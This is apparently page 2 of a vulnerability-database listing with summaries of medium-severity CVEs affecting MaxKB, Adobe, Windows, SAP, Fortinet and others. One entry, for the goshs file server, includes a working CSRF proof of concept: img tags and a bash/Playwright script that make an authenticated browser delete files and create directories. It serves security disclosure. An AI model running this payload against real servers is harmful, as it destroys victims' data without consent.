Skip to main content
CVE-2026-39420 MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated users with tool execution privileges to bypass the LD_PRELOAD-based sandbox via the env command, enabling unrestricted remote code execution and network access. The vulnerability stems from a patch that permitted execution of /usr/bin/env, which attackers can exploit using env -i to clear environment variables and drop the sandbox.so hook before spawning a native Python subprocess. Vendor-released patch: version 2.8.0.

RCE Python
NVD GitHub
CVSS 3.1
6.3
EPSS
0.2%
CVE-2026-39421 MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated attackers with workspace privileges to execute arbitrary code by exploiting a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to invoke raw system calls and bypassing the LD_PRELOAD-based sandbox.so module through the unblocked pkey_mprotect syscall, attackers can achieve remote code execution, enabling network exfiltration and container compromise. This vulnerability is confirmed fixed in version 2.8.0, and no public exploit code has been identified at time of analysis.

RCE Python
NVD GitHub
CVSS 3.1
6.3
EPSS
0.1%
CVE-2026-27299 MEDIUM This Month

Adobe FrameMaker 2022.8 and earlier allows arbitrary file system read through improper input validation when a user opens a malicious file, enabling attackers to access sensitive data on the victim's system. The vulnerability requires user interaction and is classified as information disclosure with a CVSS score of 6.3. No active exploitation or public exploit code has been identified at the time of analysis.

Information Disclosure Adobe
NVD
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-34626 MEDIUM This Month

Prototype pollution in Adobe Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier allows arbitrary file system read operations in the context of the current user when a victim opens a malicious PDF or document. The vulnerability requires user interaction but enables confidentiality compromise with high impact; no active exploitation confirmed but the attack surface is broad given Acrobat Reader's ubiquity in document handling.

Prototype Pollution Adobe Information Disclosure
NVD
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-32072 MEDIUM PATCH Exploit Unlikely This Month

Improper authentication in Windows Active Directory enables local spoofing attacks on unauthenticated users, allowing attackers with local access to bypass authentication mechanisms and gain unauthorized access to sensitive information. This vulnerability affects multiple Windows 10 and Windows 11 versions as well as Windows Server 2016 through 2025. A vendor-released patch is available from Microsoft, and the moderate CVSS score (6.2) reflects the local attack vector requirement combined with high confidentiality impact.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-26169 MEDIUM PATCH Exploit Likely This Month

Buffer over-read in Windows Kernel Memory allows authenticated local attackers to disclose sensitive kernel information with high confidence. CVE-2026-26169 affects Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2016 through 2025. The vulnerability requires local access and low-level user privileges but does not enable privilege escalation or code execution. Microsoft has released vendor patches addressing the issue across all affected versions.

Buffer Overflow Microsoft
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-21331 MEDIUM This Month

Reflected cross-site scripting (XSS) in Adobe Connect 2025.3, 12.10, and earlier allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a crafted URL, potentially compromising user session data and performing actions on behalf of the victim. The vulnerability affects multiple versions across a wide product scope and requires user interaction (clicking a malicious link) to trigger. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS Adobe
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-34614 MEDIUM This Month

Reflected Cross-Site Scripting in Adobe Connect versions 12.10 and earlier allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by distributing a malicious URL. The vulnerability requires user interaction (clicking a link) and can affect the confidentiality and integrity of user sessions across different origins due to changed scope. No public exploit code or active exploitation has been confirmed at this time.

XSS Adobe
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-0512 MEDIUM This Month

Reflected Cross-Site Scripting (XSS) in SAP Supplier Relationship Management (SRM) SICF Handler allows unauthenticated remote attackers to craft malicious URLs that, when accessed by victims, execute arbitrary JavaScript within their browsers. Successful exploitation enables attackers to steal session credentials, modify procurement data, or perform actions on behalf of authenticated users, affecting confidentiality and integrity of SRM operations. The vulnerability carries a CVSS score of 6.1 with moderate real-world risk due to required user interaction and cross-origin constraints, though no public exploit code or active exploitation has been confirmed at the time of analysis.

SAP XSS
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-27674 MEDIUM This Month

Cross-site scripting via code injection in SAP NetWeaver Application Server Java Web Dynpro allows unauthenticated remote attackers to inject arbitrary client-side code through crafted input, compromising user sessions and application data integrity when victims interact with the affected functionality. CVSS 6.1 (medium) reflects the requirement for user interaction and limited scope, but exploitation is straightforward with no authentication needed and low attack complexity.

SAP Code Injection RCE Java
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-32088 MEDIUM PATCH Exploit Unlikely This Month

Windows Biometric Service contains a race condition in concurrent resource access that allows unauthorized attackers to bypass biometric authentication controls via physical attack, affecting Windows 10 (versions 1809, 21H2, 22H2), Windows 11 (versions 22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2019, 2022, and 2025. The vulnerability requires physical access to the device and carries a moderate CVSS score of 6.1 (physical attack vector); Microsoft has released patches for all affected versions.

Authentication Bypass Race Condition Microsoft
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-32196 MEDIUM PATCH Exploit Unlikely This Month

Stored cross-site scripting (XSS) in Windows Admin Center before version 2.6.5.16 allows unauthenticated remote attackers to inject malicious scripts that execute in the browsers of other users, enabling account spoofing and data theft. The vulnerability requires user interaction (clicking a malicious link) but has network-wide scope, affecting all users of the Admin Center instance. Microsoft has released a patched version; exploitation is currently limited to scenarios where attackers can socially engineer clicks on crafted URLs.

XSS Microsoft
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-34257 MEDIUM This Month

Open redirect in SAP NetWeaver Application Server ABAP allows unauthenticated attackers to craft malicious URLs that redirect victims to attacker-controlled pages, potentially enabling phishing or credential theft attacks. The vulnerability affects all versions of SAP NetWeaver Application Server ABAP and requires user interaction (URL click). CVSS score of 6.1 reflects moderate risk with low confidentiality and integrity impact but no availability impact. No public exploit code or active exploitation has been reported at time of analysis.

SAP Open Redirect
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-5754 MEDIUM This Month

Reflected Cross-Site Scripting (XSS) Vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities.

XSS
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2025-69993 MEDIUM This Month

Leaflet through version 1.9.4 allows stored or reflected cross-site scripting (XSS) via the bindPopup() method, which renders user-supplied HTML without sanitization. Network-based attackers can inject malicious JavaScript through event handler attributes in popup content, executing arbitrary code in victims' browser sessions when they interact with affected map popups. No public exploit code or active exploitation has been confirmed at this time, though the vulnerability carries a CVSS 6.1 base score reflecting moderate risk with network-accessible attack surface and user interaction requirement.

XSS Leaflet
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2025-65132 MEDIUM This Month

Stored or reflected cross-site scripting (XSS) in alandsilva26 hotel-management-php 1.0 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in the context of authenticated administrators via a malicious room_id GET parameter in /public/admin/edit_room.php. Public exploit code exists (SSVC confirms poc status). The vulnerability requires user interaction (UI:R) to trigger, affecting confidentiality and integrity of admin sessions with partial technical impact.

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2025-65136 MEDIUM This Month

Reflected cross-site scripting (XSS) in manikandan580 School-management-system 1.0 allows unauthenticated remote attackers to inject malicious scripts via the pagedes POST parameter in /studentms/admin/contact-us.php, affecting users with browser cookies or session tokens. Publicly available exploit code exists, and the vulnerability impacts confidentiality and integrity with moderate scope. CVSS score of 6.1 reflects the requirement for user interaction to trigger the malicious payload.

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-40255 MEDIUM PATCH GHSA This Month

Open redirect vulnerability in AdonisJS @adonisjs/http-server allows unauthenticated remote attackers to redirect users to arbitrary external sites by manipulating the Referer HTTP header via the response.redirect().back() method. The vulnerability affects all AdonisJS applications using the back() redirect functionality and has been patched in version 8.2.0, which implements host validation against the incoming request's Host header. User interaction (clicking a malicious link) is required for exploitation, and no public exploit code or active exploitation has been identified.

Open Redirect
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-40883 MEDIUM PATCH GHSA This Month

### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.

CSRF Node.js Apple Google Suse +1
NVD GitHub
CVSS 4.0
6.1
EPSS
0.0%
CVE-2025-65134 MEDIUM This Month

Reflected cross-site scripting (XSS) in School Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the email POST parameter in the contact-us.php admin interface. A victim must click a crafted link, enabling attackers to steal session cookies, perform administrative actions, or redirect users to malicious sites. Public proof-of-concept code exists; however, real-world exploitation probability remains low (EPSS 0.02%) due to reliance on user interaction and limited automaton.

XSS PHP N A
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2025-68649 MEDIUM This Month

Path traversal vulnerability in Fortinet FortiAnalyzer and FortiManager (versions 7.0 through 7.6.4, including Cloud variants) allows privileged local attackers to delete arbitrary files from the underlying filesystem via crafted CLI requests. The vulnerability affects both on-premises and cloud deployments across multiple major versions. CVSS 6.0 reflects moderate integrity and availability impact, constrained by requirement for high-privilege CLI access and local attack vector.

Fortinet Path Traversal
NVD VulDB
CVSS 3.1
6.0
EPSS
0.0%
CVE-2025-61624 MEDIUM This Month

Path traversal vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiSwitchManager allows authenticated administrators with read-write permissions to write or delete arbitrary files via malicious CLI commands, potentially compromising system integrity and availability across multiple Fortinet product lines. The vulnerability affects FortiOS 6.4 through 7.6.4, FortiProxy 7.0 through 7.6.4, FortiPAM 1.0 through 1.7.0, and FortiSwitchManager 7.0 through 7.2.7. With a CVSS score of 6.0 a

Fortinet Path Traversal
NVD VulDB
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-39810 MEDIUM This Month

Hard-coded cryptographic keys in Fortinet FortiClientEMS 7.4.0 through 7.4.5 allow local authenticated attackers with high privileges to disclose sensitive information and potentially modify system configurations. An attacker with administrative access can extract or leverage these embedded keys to compromise confidentiality and integrity of protected data. This vulnerability requires local access and elevated privileges, limiting but not eliminating real-world risk in multi-user or compromised endpoint scenarios.

Fortinet Information Disclosure
NVD
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-40091 MEDIUM PATCH GHSA This Month

SpiceDB information disclosure vulnerability in startup logging allows high-privileged local attackers to obtain plaintext database passwords. When SpiceDB initializes at info log level, the startup configuration log message exposes the complete datastore DSN string containing unmasked credentials in the DatastoreConfig.URI field. Patch version 1.51.1 available; CVSS 6.0 reflects high confidentiality impact mitigated by high privilege requirement and local-only attack vector.

Information Disclosure
NVD GitHub VulDB
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-4913 MEDIUM This Month

Ivanti Neurons for ITSM before version 2025.4 allows authenticated attackers to retain access to disabled accounts via an unprotected alternate authentication path, enabling persistent unauthorized information disclosure. The vulnerability affects both on-premise and cloud deployments and requires user interaction (UI:R), limiting but not eliminating real-world risk in multi-user environments where account disablement is a critical security control.

Information Disclosure Ivanti
NVD
CVSS 3.1
5.7
EPSS
0.1%
CVE-2026-23670 MEDIUM PATCH Exploit Unlikely This Month

Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows authorized local attackers to bypass security features, affecting Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2016-2025. With a CVSS score of 5.7 and high privilege requirement (PR:H), the vulnerability requires administrative or high-privilege account access but presents significant confidentiality and integrity risk to isolated security domai

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
5.7
EPSS
0.1%
CVE-2026-20945 MEDIUM PATCH Exploit Unlikely This Month

Stored cross-site scripting (XSS) in Microsoft SharePoint Server allows authenticated users to inject malicious scripts that execute in the browsers of other authorized users viewing affected web pages, enabling account spoofing and credential theft within enterprise collaboration environments. The vulnerability affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition across all versions prior to specific patch releases. CVSS score of 4.6 reflects low severity due to authentication requirement and user interaction needed, but real-world risk is elevated in multi-user SharePoint deployments where XSS can be weaponized for privilege escalation or lateral movement.

XSS Microsoft
NVD VulDB
CVSS 3.1
4.6
EPSS
0.1%
CVE-2026-20806 MEDIUM PATCH This Month

Type confusion in Windows COM component allows authenticated local attackers to read sensitive information from memory. The vulnerability affects Windows 10 (versions 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2019/2022/2025 across multiple installation types. An attacker with local user privileges can exploit improper type handling in COM to disclose confidential data without modifying or disrupting system availability. Microsoft has released patches addressing this information disclosure risk.

Information Disclosure Memory Corruption Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-32212 MEDIUM PATCH Exploit Unlikely This Month

Improper link resolution in Windows UPnP (upnp.dll) allows authenticated local attackers to disclose sensitive information through symlink following. The vulnerability affects Windows 10 versions 1607-22H2, Windows 11 versions 22H3-26H1, and Windows Server 2012-2025. With local access and standard user privileges, an attacker can read files outside their normal access scope via crafted UPnP operations. Patch available from Microsoft; no public exploit code or active exploitation confirmed at tim

Information Disclosure
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27930 MEDIUM PATCH Exploit Unlikely This Month

Out-of-bounds read in Windows GDI allows local unauthenticated attackers to disclose sensitive information with user interaction. The vulnerability affects Windows 10 versions 1607, 1809, 21H2, and 22H2, all Windows 11 versions from 22H3 through 26H1, and Windows Server 2012 through 2025. No public exploit code or active exploitation has been confirmed; a vendor patch is available.

Buffer Overflow Information Disclosure Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27931 MEDIUM PATCH Exploit Unlikely This Month

Out-of-bounds read in Windows GDI (Graphics Device Interface) allows local attackers to disclose sensitive information without authentication. The vulnerability affects Windows 10 versions 21H2 and 22H2, Windows 11 versions 22H3 through 26H1, and Windows Server 2022/2025, requiring user interaction to trigger. Microsoft has released patches for all affected versions, with specific build numbers provided for remediation.

Buffer Overflow Information Disclosure Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-32084 MEDIUM PATCH This Month

Windows File Explorer exposes sensitive information to authenticated local users with low privileges, allowing them to read confidential data without modification or service disruption. This affects multiple Windows 10 and Windows 11 versions, as well as Windows Server 2012 through 2025. Microsoft has released patches addressing the information disclosure vector; exploitation requires local system access and valid user credentials.

Information Disclosure Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-32216 MEDIUM PATCH Exploit Unlikely This Month

Null pointer dereference in Windows Redirected Drive Buffering denies service to local authenticated users on Windows 11 version 26H1 (build 10.0.28000.0-10.0.28000.1835). An authorized attacker with local access can trigger the vulnerability to crash the affected system component, though code execution is not possible. Vendor-released patch available; no public exploit code identified at time of analysis.

Denial Of Service Null Pointer Dereference Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-32214 MEDIUM PATCH Exploit Unlikely This Month

Improper access control in Universal Plug and Play (upnp.dll) on Windows allows authenticated local attackers to disclose sensitive information without user interaction. The vulnerability affects Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2012-2025. Microsoft has released patches available through their security update guide; no public exploit code or active exploitation has been reported at time of analysis.

Authentication Bypass
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-33103 MEDIUM PATCH This Month

Improper access control in Microsoft Dynamics 365 (on-premises) version 9.0 allows authenticated local attackers to disclose sensitive information without user interaction. The vulnerability stems from insufficient authorization checks that permit users with low-level privileges to access confidential data through local access vectors. This affects Dynamics 365 on-premises deployments up to version 9.0.0043.x, with vendor-released patches available from Microsoft.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-32181 MEDIUM PATCH Exploit Unlikely This Month

Improper privilege management in Microsoft Windows allows authenticated local attackers to deny service by exploiting a privilege escalation flaw affecting Windows 10 versions 21H2 and 22H2, Windows 11 versions 22H3 through 26H1, and Windows Server 2022 and 2025. The vulnerability requires local access and valid credentials but does not permit code execution or data manipulation. CVSS 5.5 reflects moderate severity; CISA SSVC framework rates exploitation as none with partial technical impact, indicating this is not currently a priority threat despite patch availability.

Privilege Escalation Microsoft
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27301 MEDIUM This Month

Heap-based buffer overflow in Adobe FrameMaker 2022.8 and earlier allows local attackers to disclose sensitive information from process memory without user privileges, requiring only that a victim open a malicious document. CVSS 5.5 reflects confidentiality impact with low attack complexity, though no active exploitation or public proof-of-concept has been confirmed at analysis time.

Heap Overflow Buffer Overflow Adobe
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27300 MEDIUM This Month

Adobe FrameMaker 2022.8 and earlier suffers from uninitialized pointer access that leaks sensitive memory contents to local attackers. The vulnerability requires user interaction-a victim must open a specially crafted file-but once triggered, it bypasses memory protections and exposes confidential data without requiring authentication or modifying files. CVSS 5.5 reflects moderate severity (local attack vector, high confidentiality impact) with no public exploit identified at time of analysis.

Information Disclosure Memory Corruption Adobe
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27258 MEDIUM This Month

Out-of-bounds write in Adobe DNG SDK 1.7.1 2502 and earlier causes application denial-of-service through memory corruption when processing malicious DNG files. The vulnerability requires user interaction (opening a crafted file) and affects local attackers on systems where DNG SDK is deployed; no public exploit code or active exploitation has been confirmed at time of analysis.

Buffer Overflow Memory Corruption Dng Sdk
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27286 MEDIUM This Month

Heap-based buffer overflow in Adobe InDesign Desktop versions 21.2 and earlier allows local attackers to disclose sensitive information from memory without authentication, requiring only user interaction to open a malicious file. The vulnerability has a CVSS score of 5.5 with high confidentiality impact but no integrity or availability impact. No public exploit code or active exploitation has been confirmed at time of analysis.

Buffer Overflow Heap Overflow Indesign Desktop
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27222 MEDIUM This Month

Divide by zero vulnerability in Adobe Bridge versions 15.1.4 and earlier allows local denial of service when a victim opens a malicious file, crashing or freezing the application. The vulnerability requires user interaction and local file access but carries a moderate CVSS score of 5.5 due to high availability impact; no public exploit code or active exploitation has been confirmed.

Denial Of Service Bridge
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-27285 MEDIUM This Month

Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier allows local attackers to cause application denial-of-service by crafting malicious files that trigger memory corruption when opened. This vulnerability requires user interaction to exploit and does not enable code execution or data compromise, making it primarily a disruption vector rather than a critical attack surface despite its moderate CVSS score of 5.5.

Buffer Overflow Heap Overflow Indesign Desktop
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-39984 MEDIUM PATCH GHSA This Month

Authorization bypass in sigstore/timestamp-authority verifier allows attackers to prepend forged certificates to PKCS#7 certificate bags, causing the library to validate signatures with one certificate while performing authorization checks on another. The vulnerability affects the `VerifyTimestampResponse` function in timestamp-authority/v2/pkg/verification, enabling attackers to bypass authorization controls on timestamp verification. This impacts only library consumers, not the timestamp-authority service itself, and sigstore-go is unaffected due to its use of the `TSACertificate` mitigation option. EPSS 5.5, actively exploitable via local interaction.

Authentication Bypass Suse
NVD GitHub VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-4914 MEDIUM This Month

Stored cross-site scripting (XSS) in Ivanti Neurons for ITSM (on-premise and cloud) before version 2025.4 allows authenticated remote attackers to inject malicious scripts that execute in other users' sessions, enabling limited information disclosure. User interaction is required to trigger the vulnerability. No public exploit code or active exploitation has been identified.

XSS Ivanti
NVD
CVSS 3.1
5.4
EPSS
0.1%
CVE-2024-23104 MEDIUM This Month

An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Information Disclosure Fortinet
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-34213 MEDIUM PATCH This Month

Docmost versions 0.3.0 through 0.70.x allow authenticated users with low privileges to overwrite arbitrary attachments belonging to other users within the same workspace via improper authorization checks on the POST /api/files/upload endpoint. An attacker can supply a victim's attachmentId to modify or corrupt files without user interaction, compromising document integrity across the workspace. No public exploit code has been identified; patch version 0.71.0 is available.

Authentication Bypass Docmost
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-34212 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Docmost prior to version 0.71.0 allows authenticated users to inject malicious `javascript:` URLs into attachment nodes, executing arbitrary JavaScript in the browser context of other users who activate those attachments. Attack requires low privileges and user interaction (clicking the attachment), affecting all users viewing compromised pages. The vulnerability has been patched in version 0.71.0.

XSS Docmost
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-34625 MEDIUM This Month

DOM-based cross-site scripting in Adobe Experience Manager 6.5.24 and earlier allows authenticated attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious webpage that manipulates the DOM environment. The vulnerability requires user interaction and results in limited confidentiality and integrity impact. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS Adobe
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-34623 MEDIUM This Month

DOM-based Cross-Site Scripting in Adobe Experience Manager 6.5.24 and FP11.7 and earlier allows authenticated attackers to execute arbitrary JavaScript in victims' browsers by crafting malicious web pages that manipulate the DOM environment, requiring user interaction to trigger the attack. CVSS 5.4 reflects moderate severity with network-accessible attack surface but limited scope impact. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS Adobe
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-34624 MEDIUM This Month

DOM-based cross-site scripting in Adobe Experience Manager 6.5.24 and FP11.7 earlier allows authenticated users to execute arbitrary JavaScript in victims' browsers by crafting malicious webpages that manipulate the DOM environment. The vulnerability requires user interaction (victim must visit a crafted page) and affects the confidentiality and integrity of user sessions within the AEM application context. CVSS 5.4 reflects the moderate severity; no public exploit code or active exploitation has been confirmed at time of analysis.

XSS Adobe
NVD
CVSS 3.1
5.4
EPSS
0.0%
Prev Page 2 of 3 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy